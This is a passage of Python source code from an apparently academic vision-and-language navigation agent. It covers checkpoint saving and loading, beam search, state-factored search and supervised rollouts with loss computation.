reward[range(gen_spls.shape[0]), tj_steps] = [x - y for x, y in zip(gen_scores['spl'], greedy_scores['spl'])]
elif self.reward_func == 'spl_psc': # test
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.full((gen_spls.shape[0], self.episode_len), -sc_length_scale, dtype=float) # penalty
reward[range(gen_spls.shape[0]), tj_steps] = gen_scores['spl']
# discounted immediate reward
if sc_discouted_immediate_r_scale>0:
discounted_r = discount_rewards(gen_scores['immediate_rewards'], self.episode_len) * sc_discouted_immediate_r_scale
reward = reward + discounted_r
# penalty on trajectory length
if sc_length_scale:
length_penalty = np.repeat(gen_lengths[:, np.newaxis], self.episode_len, 1)*sc_length_scale
reward = reward - length_penalty
return reward
def save(self, encoder_path, decoder_path):
''' Snapshot models '''
write_num = 0
while (write_num < 10):
try:
torch.save(self.encoder.state_dict(), encoder_path)
torch.save(self.decoder.state_dict(), decoder_path)
if torch.cuda.is_available():
torch.save(torch.cuda.random.get_rng_state(), decoder_path + '.rng.gpu')
torch.save(torch.random.get_rng_state(), decoder_path + '.rng')
with open(decoder_path + '.rng2', 'wb') as f:
pickle.dump(random.getstate(), f)
break
except Exception: # transient I/O failure; retry up to 10 times
write_num += 1
def delete(self, encoder_path, decoder_path):
''' Delete models '''
os.remove(encoder_path)
os.remove(decoder_path)
os.remove(decoder_path+'.rng.gpu')
os.remove(decoder_path+'.rng')
os.remove(decoder_path+'.rng2')
def load(self, encoder_path, decoder_path):
''' Loads parameters (but not training state) '''
self.encoder.load_state_dict(torch.load(encoder_path, 'cuda:0' if torch.cuda.is_available() else 'cpu'))
self.decoder.load_state_dict(torch.load(decoder_path, 'cuda:0' if torch.cuda.is_available() else 'cpu'), strict=False)
self.encoder.to(device)
self.decoder.to(device)
if self.monotonic:
self.copy_seq2seq()
try:
with open(decoder_path+'.rng2','rb') as f:
random.setstate(pickle.load(f))
torch.random.set_rng_state(torch.load(decoder_path + '.rng'))
torch.cuda.random.set_rng_state(torch.load(decoder_path + '.rng.gpu'))
except FileNotFoundError:
print('Warning: RNG state files not found; skipping random state restore')
def copy_seq2seq(self):
self.encoder2=copy.deepcopy(self.encoder)
self.decoder2=copy.deepcopy(self.decoder)
self.encoder2.eval()
self.decoder2.eval()
for param in self.encoder2.parameters():
param.requires_grad = False
for param in self.decoder2.parameters():
param.requires_grad = False
class PretrainVLAgent(BaseAgent):
''' An agent based on an LSTM seq2seq model with attention. '''
model_actions, env_actions = basic_actions()
feedback_options = ['teacher', 'argmax', 'sample']
def __init__(self, env, results_path, encoder, decoder, seed, aux_ratio, decoder_init,
params=None, monotonic=False, episode_len=20, state_factored=False): # , subgoal
super(PretrainVLAgent, self).__init__(env, results_path, seed=seed)
self.encoder, self.decoder = encoder, decoder # encoder2 is only for self_critic
self.encoder2, self.decoder2 = None, None
self.monotonic = monotonic
if self.monotonic:
self.copy_seq2seq()
self.episode_len = episode_len
self.losses = []
self.losses_ctrl_f = [] # For learning auxiliary tasks
self.aux_ratio = aux_ratio
self.decoder_init = decoder_init
self.clip_gradient = params['clip_gradient']
self.clip_gradient_norm = params['clip_gradient_norm']
self.reward_func = params['reward_func']
self.schedule_ratio = params['schedule_ratio']
self.temp_alpha = params['temp_alpha']
self.testing_settingA = params['test_A']
if self.decoder.action_space == 6:
self.ignore_index = self.model_actions.index('<ignore>')
else:
self.ignore_index = -1
self.criterion = nn.CrossEntropyLoss(ignore_index=self.ignore_index)
if self.decoder.ctrl_feature:
assert self.decoder.action_space == -1 # currently only implement this
self.criterion_ctrl_f = nn.MSELoss() # todo: MSE or ?
self.state_factored = state_factored
@staticmethod
def n_inputs():
return len(PretrainVLAgent.model_actions)
@staticmethod
def n_outputs():
return len(PretrainVLAgent.model_actions) - 2 # Model doesn't output <start> or <ignore>
def _sort_batch(self, obs):
sorted_tensor, mask, seq_lengths, perm_idx = sort_batch(obs)
if isinstance(sorted_tensor, list):
sorted_tensors, masks, seqs_lengths = [], [], []
for i in range(len(sorted_tensor)):
sorted_tensors.append(Variable(sorted_tensor[i], requires_grad=False).long().to(device))
masks.append(mask[i].byte().to(device))
seqs_lengths.append(seq_lengths[i])
return sorted_tensors, masks, seqs_lengths, perm_idx
return Variable(sorted_tensor, requires_grad=False).long().to(device), \
mask.byte().to(device), \
list(seq_lengths), list(perm_idx)
def _feature_variable(self, obs):
''' Extract precomputed features into variable. '''
#feature_size = obs[0]['feature'].shape[0]
#features = np.empty((len(obs),feature_size), dtype=np.float32)
if isinstance(obs[0]['feature'],tuple): # todo?
features_pano = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'][0], dtype=np.float32), 0), len(obs), axis=0) # jolin
features = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'][1], dtype=np.float32), 0), len(obs), axis=0) # jolin
for i,ob in enumerate(obs):
features_pano[i] = ob['feature'][0]
features[i] = ob['feature'][1]
return (Variable(torch.from_numpy(features_pano), requires_grad=False).to(device),
Variable(torch.from_numpy(features), requires_grad=False).to(device))
else:
features = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'], dtype=np.float32),0),len(obs),axis=0) # jolin
for i,ob in enumerate(obs):
features[i] = ob['feature']
return Variable(torch.from_numpy(features), requires_grad=False).to(device)
def get_next(self, feedback, target, logit):
if feedback == 'teacher':
a_t = target # teacher forcing
elif feedback == 'argmax':
_, a_t = logit.max(1) # student forcing - argmax
a_t = a_t.detach()
elif feedback == 'sample':
probs = F.softmax(logit, dim=1)
m = D.Categorical(probs)
a_t = m.sample() # sampling an action from model
else:
sys.exit('Invalid feedback option')
return a_t
def _action_variable(self, obs):
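# Pads the per-observation navigable-action embeddings to the maximum action count in the batch
# and returns (action embeddings, is_valid mask as a tensor, is_valid mask as a numpy array).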
# get the maximum number of actions of all sample in this batch
max_num_a = -1
for i, ob in enumerate(obs):
max_num_a = max(max_num_a, len(ob['adj_loc_list']))
is_valid = np.zeros((len(obs), max_num_a), np.float32)
action_embedding_dim = obs[0]['action_embedding'].shape[-1]
action_embeddings = np.zeros((len(obs), max_num_a, action_embedding_dim), dtype=np.float32)
for i, ob in enumerate(obs):
adj_loc_list = ob['adj_loc_list']
num_a = len(adj_loc_list)
is_valid[i, 0:num_a] = 1.
action_embeddings[i, :num_a, :] = ob['action_embedding'] #bug: todo
#for n_a, adj_dict in enumerate(adj_loc_list):
# action_embeddings[i, :num_a, :] = ob['action_embedding']
return (Variable(torch.from_numpy(action_embeddings), requires_grad=False).to(device),
Variable(torch.from_numpy(is_valid), requires_grad=False).to(device),
is_valid)
def _teacher_action_variable(self, obs):
# get the maximum number of actions of all sample in this batch
action_embedding_dim = obs[0]['action_embedding'].shape[-1]
action_embeddings = np.zeros((len(obs), action_embedding_dim), dtype=np.float32)
for i, ob in enumerate(obs):
adj_loc_list = ob['adj_loc_list']
action_embeddings[i, :] = ob['action_embedding'][ob['teacher']] #bug: todo
#for n_a, adj_dict in enumerate(adj_loc_list):
# action_embeddings[i, :num_a, :] = ob['action_embedding']
return Variable(torch.from_numpy(action_embeddings), requires_grad=False).to(device)
def _teacher_action(self, obs, ended):
a = teacher_action(self.model_actions, self.decoder.action_space, obs, ended, self.ignore_index)
return Variable(a, requires_grad=False).to(device)
def _teacher_feature(self, obs, ended):#, max_num_a):
''' Extract teacher look ahead auxiliary features into variable. '''
# todo: 6 action space
ctrl_features_dim = -1
for i, ob in enumerate(obs): # todo: whether include <stop> ?
# max_num_a = max(max_num_a, len(ob['ctrl_features']))
if ctrl_features_dim<0 and len(ob['ctrl_features']):
ctrl_features_dim = ob['ctrl_features'].shape[-1] #[0].shape[-1]
break
# is_valid does not need to be built here; it is already produced by _action_variable
ctrl_features_tensor = np.zeros((len(obs), ctrl_features_dim), dtype=np.float32)
for i, ob in enumerate(obs):
if not ended[i]:
ctrl_features_tensor[i, :] = ob['ctrl_features']
return Variable(torch.from_numpy(ctrl_features_tensor), requires_grad=False).to(device)
def rollout(self, beam_size=1, successors=1):
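# Dispatcher: with beam_size == 1 run a greedy rollout (pretrain_rollout_with_loss for a
# BertImgEncoder, rollout_with_loss otherwise); with a larger beam, run beam search or
# state-factored search under torch.no_grad().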
if beam_size == 1 and not debug_beam:
if self.encoder.__class__.__name__ == 'BertImgEncoder':
return self.pretrain_rollout_with_loss()
else:
return self.rollout_with_loss()
# beam
with torch.no_grad():
if self.state_factored:
beams = self.state_factored_search(beam_size, successors, first_n_ws_key=4)
else:
beams = self.beam_search(beam_size)
return beams
def state_factored_search(self, completion_size, successor_size, first_n_ws_key=4):
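# State-factored search: instead of a fixed-width beam, states are keyed by the first
# first_n_ws_key fields of the world state and only the best-scoring InferenceState per key is
# cached. Up to successor_size unexpanded states are expanded per step until completion_size
# finished trajectories exist per instruction; traversed_lists records the sequence of states
# actually visited while expanding, so the searched path can be replayed.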
assert self.decoder.panoramic
world_states = self.env.reset(sort=True)
initial_obs = (self.env._get_obs(world_states))
batch_size = len(world_states)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch([o for ob in initial_obs for o in ob])
world_states = [[world_state for f, world_state in states] for states in world_states]
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
completed = []
completed_holding = []
for _ in range(batch_size):
completed.append({})
completed_holding.append({})
state_cache = [
{ws[0][0:first_n_ws_key]: (InferenceState(prev_inference_state=None,
world_state=ws[0],
observation=o[0],
flat_index=None,
last_action=-1,
last_action_embedding=self.decoder.u_begin,
action_count=0,
score=0.0, h_t=h_t[i], c_t=c_t[i], last_alpha=None), True)}
for i, (ws, o) in enumerate(zip(world_states, initial_obs))
]
beams = [[inf_state for world_state, (inf_state, expanded) in sorted(instance_cache.items())]
for instance_cache in state_cache] # sorting is a no-op here since each instance_cache holds a single entry at this point
last_expanded_list = []
traversed_lists = []
for beam in beams:
assert len(beam)==1
first_state = beam[0]
last_expanded_list.append(first_state)
traversed_lists.append([first_state])
def update_traversed_lists(new_visited_inf_states):
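# Extends each instance's traversed list with the viewpoint path from the previously expanded
# state to every newly visited state (via least_common_viewpoint_path), dropping the duplicated
# first element, and remembers the last expanded state per instance.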
assert len(new_visited_inf_states) == len(last_expanded_list)
assert len(new_visited_inf_states) == len(traversed_lists)
for instance_index, instance_states in enumerate(new_visited_inf_states):
last_expanded = last_expanded_list[instance_index]
# todo: if this passes, shouldn't need traversed_lists
assert last_expanded.world_state.viewpointId == traversed_lists[instance_index][-1].world_state.viewpointId
for inf_state in instance_states:
path_from_last_to_next = least_common_viewpoint_path(last_expanded, inf_state)
# path_from_last should include last_expanded's world state as the first element, so check and drop that
assert path_from_last_to_next[0].world_state.viewpointId == last_expanded.world_state.viewpointId
assert path_from_last_to_next[-1].world_state.viewpointId == inf_state.world_state.viewpointId
traversed_lists[instance_index].extend(path_from_last_to_next[1:])
last_expanded = inf_state
last_expanded_list[instance_index] = last_expanded
# Do a sequence rollout and calculate the loss
while any(len(comp) < completion_size for comp in completed):
beam_indices = []
u_t_list = []
h_t_list = []
c_t_list = []
flat_obs = []
for beam_index, beam in enumerate(beams):
for inf_state in beam:
beam_indices.append(beam_index)
u_t_list.append(inf_state.last_action_embedding)
h_t_list.append(inf_state.h_t.unsqueeze(0))
c_t_list.append(inf_state.c_t.unsqueeze(0))
flat_obs.append(inf_state.observation)
u_t_prev = torch.stack(u_t_list, dim=0)
assert len(u_t_prev.shape) == 2
# Image features from obs
# if self.decoder.panoramic:
f_t_all, f_t = self._feature_variable(flat_obs)
# Action feature from obs
# if self.decoder.action_space == 6:
# u_t_features, is_valid = np.zeros((batch_size, 1)), None
# else:
u_t_features, is_valid, is_valid_numpy = self._action_variable(flat_obs)
h_t = torch.cat(h_t_list, dim=0)
c_t = torch.cat(c_t_list, dim=0)
h_t, c_t, alpha, logit, pred_f = self.decoder(None, u_t_prev, u_t_features, f_t,
f_t_all, h_t, c_t, [ctx_si[beam_indices] for ctx_si in ctx] if isinstance(ctx, list) else ctx[beam_indices],
[seq_mask_si[beam_indices] for seq_mask_si in seq_mask] if isinstance(ctx, list) else seq_mask[beam_indices])
# Mask outputs of invalid actions
logit[is_valid == 0] = -float('inf')
# # Mask outputs where agent can't move forward
# no_forward_mask = [len(ob['navigableLocations']) <= 1 for ob in flat_obs]
masked_logit = logit
log_probs = F.log_softmax(logit, dim=1).data
# force ending if we've reached the max time steps
# if t == self.episode_len - 1:
# action_scores = log_probs[:,self.end_index].unsqueeze(-1)
# action_indices = torch.from_numpy(np.full((log_probs.size()[0], 1), self.end_index))
# else:
#_, action_indices = masked_logit.data.topk(min(successor_size, logit.size()[1]), dim=1)
_, action_indices = masked_logit.data.topk(logit.size()[1], dim=1) # todo: fix this
action_scores = log_probs.gather(1, action_indices)
assert action_scores.size() == action_indices.size()
start_index = 0
assert len(beams) == len(world_states)
all_successors = []
for beam_index, (beam, beam_world_states) in enumerate(zip(beams, world_states)):
successors = []
end_index = start_index + len(beam)
assert len(beam_world_states) == len(beam)
if beam:
for inf_index, (inf_state, world_state, action_score_row) in \
enumerate(zip(beam, beam_world_states, log_probs[start_index:end_index])):
flat_index = start_index + inf_index
for action_index, action_score in enumerate(action_score_row):
if is_valid_numpy[flat_index, action_index] == 0:
continue
successors.append(
InferenceState(prev_inference_state=inf_state, world_state=world_state,
observation=flat_obs[flat_index],
flat_index=None,
last_action=action_index,
last_action_embedding=u_t_features[flat_index, action_index].detach(),
action_count=inf_state.action_count + 1,
score=float(inf_state.score + action_score),
h_t=h_t[flat_index], c_t=c_t[flat_index],
last_alpha=[alpha_si[flat_index].data for alpha_si in alpha] if isinstance(alpha, list) else alpha[flat_index].data)
)
start_index = end_index
successors = sorted(successors, key=lambda t: t.score, reverse=True)
all_successors.append(successors)
successor_world_states = [
[inf_state.world_state for inf_state in successors]
for successors in all_successors
]
successor_env_actions = [
[inf_state.last_action for inf_state in successors]
for successors in all_successors
]
successor_last_obs = [
[inf_state.observation for inf_state in successors]
for successors in all_successors
]
successor_world_states = self.env.step(successor_env_actions, successor_last_obs, successor_world_states)
successor_world_states = [[world_state for f, world_state in states] for states in successor_world_states]
updated_successors = []
for succs, succ_ws in zip(all_successors, successor_world_states):
mapped = [inf._replace(world_state=ws) for inf, ws in zip(succs, succ_ws)]
updated_successors.append(mapped)
all_successors = updated_successors
assert len(all_successors) == len(state_cache)
new_beams = []
for beam_index, (successors, instance_cache) in enumerate(zip(all_successors, state_cache)):
# early stop if we've already built a sizable completion list
instance_completed = completed[beam_index]
instance_completed_holding = completed_holding[beam_index]
if len(instance_completed) >= completion_size:
new_beams.append([])
continue
for successor in successors:
ws_keys = successor.world_state[0:first_n_ws_key]
if successor.last_action == 0 or successor.action_count == self.episode_len:
if ws_keys not in instance_completed_holding or instance_completed_holding[ws_keys][
0].score < successor.score:
instance_completed_holding[ws_keys] = (successor, False)
else:
if ws_keys not in instance_cache or instance_cache[ws_keys][0].score < successor.score:
instance_cache[ws_keys] = (successor, False)
# third value: did this come from completed_holding?
uncompleted_to_consider = ((ws_keys, inf_state, False) for (ws_keys, (inf_state, expanded)) in
instance_cache.items() if not expanded)
completed_to_consider = ((ws_keys, inf_state, True) for (ws_keys, (inf_state, expanded)) in
instance_completed_holding.items() if not expanded)
import itertools
import heapq
to_consider = itertools.chain(uncompleted_to_consider, completed_to_consider)
ws_keys_and_inf_states = heapq.nlargest(successor_size, to_consider, key=lambda pair: pair[1].score)
new_beam = []
for ws_keys, inf_state, is_completed in ws_keys_and_inf_states:
if is_completed:
assert instance_completed_holding[ws_keys] == (inf_state, False)
instance_completed_holding[ws_keys] = (inf_state, True)
if ws_keys not in instance_completed or instance_completed[ws_keys].score < inf_state.score:
instance_completed[ws_keys] = inf_state
else:
instance_cache[ws_keys] = (inf_state, True)
new_beam.append(inf_state)
if len(instance_completed) >= completion_size:
new_beams.append([])
else:
new_beams.append(new_beam)
beams = new_beams
# Early exit if all ended
if not any(beam for beam in beams):
break
world_states = [
[inf_state.world_state for inf_state in beam]
for beam in beams
]
successor_obs = np.array(self.env._get_obs(self.env.world_states2feature_states(world_states)))
updated_beams = []
for beam, beam_obs in zip(beams, successor_obs):
mapped = [inf._replace(observation=o) for inf, o in zip(beam, beam_obs)]
updated_beams.append(mapped)
beams = updated_beams
update_traversed_lists(beams)
completed_list = []
for this_completed in completed:
completed_list.append(sorted(this_completed.values(), key=lambda t: t.score, reverse=True)[:completion_size])
completed_ws = [
[inf_state.world_state for inf_state in comp_l]
for comp_l in completed_list
]
completed_obs = np.array(self.env._get_obs(self.env.world_states2feature_states(completed_ws)))
updated_completed = []
for comp_l, comp_obs in zip(completed_list, completed_obs):
mapped = [inf._replace(observation=o) for inf, o in zip(comp_l, comp_obs)]
updated_completed.append(mapped)
completed_list = updated_completed
update_traversed_lists(completed_list)
trajs = []
for this_completed in completed_list:
assert this_completed
this_trajs = []
for inf_state in this_completed:
path_states, path_observations, path_actions, path_scores, path_attentions = backchain_inference_states(inf_state)
# this will have messed-up headings for (at least some) starting locations because of
# discretization, so read from the observations instead
## path = [(obs.viewpointId, state.heading, state.elevation)
## for state in path_states]
trajectory = [path_element_from_observation(ob) for ob in path_observations]
this_trajs.append({
'instr_id': path_observations[0]['instr_id'],
'instr_encoding': path_observations[0]['instr_encoding'],
'path': trajectory,
'observations': path_observations,
'actions': path_actions,
'score': inf_state.score,
'scores': path_scores,
'attentions': path_attentions
})
trajs.append(this_trajs)
return trajs, completed_list, traversed_lists
def beam_search(self, beam_size):
assert self.decoder.panoramic
# assert self.env.beam_size >= beam_size
world_states = self.env.reset(True) # [(feature, state)]
obs = np.array(self.env._get_obs(world_states))
batch_size = len(world_states)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch([o for ob in obs for o in ob])
world_states = [[world_state for f, world_state in states] for states in world_states]
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
completed = []
for _ in range(batch_size):
completed.append([])
beams = [[InferenceState(prev_inference_state=None,
world_state=ws[0],
observation=o[0],
flat_index=i,
last_action=-1,
last_action_embedding=self.decoder.u_begin,
action_count=0,
score=0.0,
h_t=None, c_t=None,
last_alpha=None)]
for i, (ws, o) in enumerate(zip(world_states, obs))]
#
# batch_size x beam_size
for t in range(self.episode_len):
flat_indices = []
beam_indices = []
u_t_list = []
for beam_index, beam in enumerate(beams):
for inf_state in beam:
beam_indices.append(beam_index)
flat_indices.append(inf_state.flat_index)
u_t_list.append(inf_state.last_action_embedding)
u_t_prev = torch.stack(u_t_list, dim=0)
flat_obs = [ob for obs_beam in obs for ob in obs_beam]
# Image features from obs
# if self.decoder.panoramic:
f_t_all, f_t = self._feature_variable(flat_obs)
# Action feature from obs
# if self.decoder.action_space == 6:
# u_t_features, is_valid = np.zeros((batch_size, 1)), None
# else:
u_t_features, is_valid, is_valid_numpy = self._action_variable(flat_obs)
h_t, c_t, alpha, logit, pred_f = self.decoder(None, u_t_prev, u_t_features,
f_t, f_t_all, h_t[flat_indices], c_t[flat_indices],
[ctx_si[beam_indices] for ctx_si in ctx] if isinstance(ctx, list) else ctx[beam_indices],
[seq_mask_si[beam_indices] for seq_mask_si in seq_mask] if isinstance(ctx, list) else seq_mask[beam_indices])
# Mask logits of invalid actions
logit[is_valid == 0] = -float('inf')
masked_logit = logit # for debug
log_probs = F.log_softmax(logit, dim=1).data
_, action_indices = masked_logit.data.topk(min(beam_size, logit.size()[1]), dim=1)
action_scores = log_probs.gather(1, action_indices)
assert action_scores.size() == action_indices.size()
start_index = 0
new_beams = []
assert len(beams) == len(world_states)
all_successors = []
for beam_index, (beam, beam_world_states, beam_obs) in enumerate(zip(beams, world_states, obs)):
successors = []
end_index = start_index + len(beam)
assert len(beam_obs) == len(beam) and len(beam_world_states) == len(beam)
if beam:
for inf_index, (inf_state, world_state, ob, action_score_row, action_index_row) in \
enumerate(zip(beam, beam_world_states, beam_obs, action_scores[start_index:end_index],
action_indices[start_index:end_index])):
flat_index = start_index + inf_index
for action_score, action_index in zip(action_score_row, action_index_row):
if is_valid_numpy[flat_index, action_index] == 0:
continue
successors.append(
InferenceState(prev_inference_state=inf_state,
world_state=world_state, # will be updated later after successors are pruned
observation=ob, # will be updated later after successors are pruned
flat_index=flat_index,
last_action=action_index,
last_action_embedding=u_t_features[flat_index, action_index].detach(),
action_count=inf_state.action_count + 1,
score=float(inf_state.score + action_score), h_t=None, c_t=None,
last_alpha=[alpha_si[flat_index].data for alpha_si in alpha] if isinstance(alpha, list) else alpha[flat_index].data)
)
start_index = end_index
successors = sorted(successors, key=lambda t: t.score, reverse=True)[:beam_size]
all_successors.append(successors)
successor_world_states = [
[inf_state.world_state for inf_state in successors]
for successors in all_successors
]
successor_env_actions = [
[inf_state.last_action for inf_state in successors]
for successors in all_successors
]
successor_last_obs = [
[inf_state.observation for inf_state in successors]
for successors in all_successors
]
successor_world_states=self.env.step(successor_env_actions, successor_last_obs, successor_world_states)
successor_obs = np.array(self.env._get_obs(successor_world_states))
successor_world_states = [[world_state for f, world_state in states] for states in successor_world_states]
acc = []
for successors_ws_obs in zip(all_successors, successor_world_states, successor_obs):
mapped = [inf._replace(world_state=ws, observation=o) for inf, ws, o in zip(*successors_ws_obs)]
acc.append(mapped)
all_successors=acc
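# Partition the pruned successors: a successor that emitted the stop action (index 0)
# or reached the last step goes to `completed`; the rest form the next beam. Once a
# batch element has collected beam_size completed hypotheses, its beam is cleared.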
for beam_index, successors in enumerate(all_successors):
new_beam = []
for successor in successors:
if successor.last_action == 0 or t == self.episode_len - 1:
completed[beam_index].append(successor)
else:
new_beam.append(successor)
if len(completed[beam_index]) >= beam_size:
new_beam = []
new_beams.append(new_beam)
beams = new_beams
world_states = [
[inf_state.world_state for inf_state in beam]
for beam in beams
]
obs = [
[inf_state.observation for inf_state in beam]
for beam in beams
]
# Early exit if all ended
if not any(beam for beam in beams):
break
trajs = []
for this_completed in completed:
assert this_completed
this_trajs = []
for inf_state in sorted(this_completed, key=lambda t: t.score, reverse=True)[:beam_size]:
path_states, path_observations, path_actions, path_scores, path_attentions = backchain_inference_states(inf_state)
# this will have messed-up headings for (at least some) starting locations because of
# discretization, so read from the observations instead
## path = [(obs.viewpointId, state.heading, state.elevation)
## for state in path_states]
trajectory = [path_element_from_observation(ob) for ob in path_observations]
this_trajs.append({
'instr_id': path_observations[0]['instr_id'],
'instr_encoding': path_observations[0]['instr_encoding'],
'path': trajectory,
'observations': path_observations,
'actions': path_actions,
'score': inf_state.score,
'scores': path_scores,
'attentions': path_attentions
})
trajs.append(this_trajs)
traversed_lists = None # todo
return trajs, completed, traversed_lists
def rollout_with_loss(self):
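# Single-step (non-beam) rollout that accumulates the cross-entropy loss against the
# teacher action at every step, plus an optional auxiliary feature-prediction loss when
# self.decoder.ctrl_feature is set. The feedback mode (teacher/sample/argmax) controls
# which action is actually executed in the environment.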
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
batch_size = len(obs)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
# When there are multiple sentences, perm_idx is simply range(batch_size);
# the per-sentence permutation for the i-th sentence (i = 1, 2 or 3) is stored inside seq_lengths,
# i.e. seq_lengths = [(seq_lengths, perm_idx), (seq_lengths, perm_idx), (seq_lengths, perm_idx)]
# Record starting point
traj = [{'instr_id': ob['instr_id'], 'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]} for ob in perm_obs]
# Forward through encoder, giving initial hidden state and memory cell for decoder
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
#h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
c_t = torch.zeros_like(c_t) # debug
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if self.decoder.action_space == -1:
u_t_prev = self.decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() * self.model_actions.index('<start>'), requires_grad=False).to(device)
ended = np.array([False] * batch_size) # Indices match permutation of the model, not env
# Do a sequence rollout and calculate the loss
self.loss = 0
self.loss_ctrl_f = 0
env_action = [None] * batch_size
# for plot
#all_alpha = []
action_scores = np.zeros((batch_size,))
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if self.decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if self.decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Supervised training
target = self._teacher_action(perm_obs, ended)
h_t, c_t, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, h_t, c_t, ctx, seq_mask)
# all_alpha.append(alpha)
# Mask outputs where agent can't move forward
if self.decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else:
logit[is_valid == 0] = -float('inf')
# if self.decoder.ctrl_feature:
# pred_f[is_valid == 0] = 0
if self.temp_alpha != 0: # add temperature
logit = logit/self.temp_alpha
self.loss += self.criterion(logit, target)
# Auxiliary training
if self.decoder.ctrl_feature:
target_f = self._teacher_feature(perm_obs, ended)#, is_valid.shape[-1])
self.loss_ctrl_f += self.aux_ratio * self.criterion_ctrl_f(pred_f, target_f)
# todo: add auxiliary tasks to sc-rl training?
# Determine next model inputs
# scheduled sampling
if self.schedule_ratio >= 0 and self.schedule_ratio <= 1:
sample_feedback = random.choices(['sample', 'teacher'], [self.schedule_ratio, 1 - self.schedule_ratio], k=1)[0] # schedule sampling
if self.feedback != 'argmax': # ignore test case
self.feedback = sample_feedback
a_t = self.get_next(self.feedback, target, logit)
# setting A
if self.testing_settingA:
log_probs = F.log_softmax(logit, dim=1).data
action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
# log_probs = F.log_softmax(logit, dim=1).data
# action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
a_t_prev = a_t
if self.decoder.action_space != 6: # update the previous action
u_t_prev = u_t_features[np.arange(batch_size), a_t, :].detach()
# Update the 'ended' list and build the environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
# # sub_stages[idx] = max(sub_stages[idx]-1, 0)
# # ended[i] = (sub_stages[idx]==0)
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if action_idx == 0:
# # sub_stages[idx] = max(sub_stages[idx] - 1, 0)
# # ended[i] = (sub_stages[idx] == 0)
ended[i] = True
env_action[idx] = action_idx
# state transitions
new_states = self.env.step(env_action, obs)
obs = np.array(self.env._get_obs(new_states))
#obs = np.array(self.env._get_obs(self.env.step(env_action, obs))) # , sub_stages
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.testing_settingA:
if not ended[i]:
action_scores[idx] = action_scores[idx] + action_score[i]
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
else:
if action_idx == 0:
ended[i] = True
# for i,idx in enumerate(perm_idx):
# action_idx = a_t[i].item()
# # if not ended[i]:
# # action_scores[idx] = action_scores[idx] + action_score[i]
# if self.decoder.action_space == 6:
# if action_idx == self.model_actions.index('<end>'):
# ended[i] = True
# else:
# if action_idx == 0:
# ended[i] = True
# Early exit if all ended
if ended.all(): break
# episode_len is a constant, so normalising the loss by it would only rescale it uniformly
self.losses.append(self.loss.item()) # / self.episode_len)
if self.decoder.ctrl_feature:
self.losses_ctrl_f.append(self.loss_ctrl_f.item()) # / self.episode_len)
# with open('preprocess/alpha.pkl', 'wb') as alpha_f: # TODO: remove for release!!!!
# pickle.dump(all_alpha, alpha_f)
# choose one of the three trajectories according to its probability
# for t,p in zip(traj, action_scores):
#     t['prob'] = p
if self.testing_settingA:
for t, p in zip(traj, action_scores):
t['prob'] = p
return traj
def pretrain_rollout_with_loss(self):
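# Variant of rollout_with_loss used for pretraining: the encoder is re-run at every step
# with the current panoramic feature (f_t_all), and its hidden state is only used to
# initialise the decoder at t == 0; afterwards the decoder unrolls as a normal LSTM on
# its own hidden state.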
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
batch_size = len(obs)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
# When there are multiple sentences, perm_idx is simply range(batch_size);
# the per-sentence permutation for the i-th sentence (i = 1, 2 or 3) is stored inside seq_lengths,
# i.e. seq_lengths = [(seq_lengths, perm_idx), (seq_lengths, perm_idx), (seq_lengths, perm_idx)]
# Record starting point
traj = [{'instr_id': ob['instr_id'], 'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]} for ob in perm_obs]
## Forward through encoder, giving initial hidden state and memory cell for decoder
#f_t = self._feature_variable(perm_obs)
#if self.decoder.panoramic: f_t_all, f_t = f_t
#else: f_t_all = np.zeros((batch_size, 1))
#ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=f_t_all)
###ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=f_t_all)
#if not self.decoder_init:
# h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
# #c_t = torch.zeros_like(c_t) # debug
# Initial action
